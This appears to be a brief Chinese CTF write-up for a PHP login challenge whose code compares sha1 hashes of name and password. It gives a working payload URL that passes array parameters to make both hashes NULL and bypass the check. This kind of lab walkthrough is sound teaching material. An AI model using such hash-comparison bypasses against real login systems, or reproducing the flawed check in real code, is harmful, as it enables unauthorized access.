版权声明:a3uRa QQ:962620891 github:asuralinmo.github.io https://blog.csdn.net/qq_41173457/article/details/81546231
<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
if ($_GET['name'] == $_GET['password'])
echo '<p>Your password can not be your name!</p>';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo '<p>Invalid password.</p>';
}
else{
echo '<p>Login first!</p>';
?>
先随便输点什么进去看看,http://ctf5.shiyanbar.com/web/false.php?name=11&password=1111
这里可以用数组绕过
随便一个payload:http://ctf5.shiyanbar.com/web/false.php?name[]=&password[]=f
至于原理嘛,自己百度Google吧,很简单